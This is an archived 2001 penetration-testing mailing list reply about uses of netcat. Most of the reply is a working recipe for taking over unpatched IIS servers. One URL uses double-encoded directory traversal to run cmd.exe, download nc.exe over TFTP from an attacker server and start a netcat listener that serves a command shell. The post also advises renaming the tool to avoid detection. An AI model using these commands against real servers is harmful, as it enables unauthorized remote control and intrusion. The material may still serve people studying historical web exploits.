Penetration Testing mailing list archives

Re: Ideas on netcat

From: "Assess" <assess () cmsecurenet com>
Date: Mon, 27 Aug 2001 18:01:35 -0400

This is a simple way to take over an  IIS web server without the unicode
patch. It requires a firewall has TFTP outbound active and an inbound port
available with nothing loaded on it. While several things must occur for
this to work I have had it work twice out of ten assessments so the odds may
still be good. You may want to rename nc.exe to something less obvious.

Get Netcat from your tftp server

http://VICTIMADDRESSHERE/scripts/..%255c../..%255c../..%255c../winnt/system3
2/cmd.exe?/c+tftp.exe+-i+TFTPSERVERADDRESSHERE+GET+nc.exe+c:\nc.exe

Start netcat on port23 or any port that is open inbound, and unused, through
the firewall. TCP port 53 works more often than not if DNS has been
configured incorrectly.

http://VICTIMADDRESS/scripts/..%255c../..%255c../..%255c../winnt/system32/cm
d.exe?/c+nc%20-l%20-p%2023%20-t%20-e%20cmd.exe

Telnet to the port on the target system. If it works you should have a c:\
prompt.

----- Original Message -----
From: "Vo0d0o" <voodooo () rediffmail com>
To: <pen-test () securityfocus com>
Sent: Friday, August 24, 2001 2:29 AM
Subject: Ideas on netcat



To all netcat gurus,

I hav been experimentin on netcat for a few days and searchin almost
everyday on netcat for some possible uses ,but in vain.

As far as I know, no site is giving some other uses of netcat pertaining to
pen-testing ...other than the usual *README* file which I find too basic.

I would be grateful if anybody could throw some light on uses of netcat in
pen-testing.

Thanx in advance.

Cheers,
Kartik.






----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/




----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Current thread:

Ideas on netcat Vo0d0o (Aug 27)
- Re: Ideas on netcat Assess (Aug 29)
- Re: Ideas on netcat Dave Aitel (Aug 29)
- Re: Ideas on netcat Penetration Testing (Aug 29)
- Re: Ideas on netcat Pawel Krawczyk (Aug 29)
- Re: Ideas on netcat BS (Aug 29)
- Re: Ideas on netcat Forrest Rae (Aug 29)
- Re: Ideas on netcat Jose Nazario (Aug 29)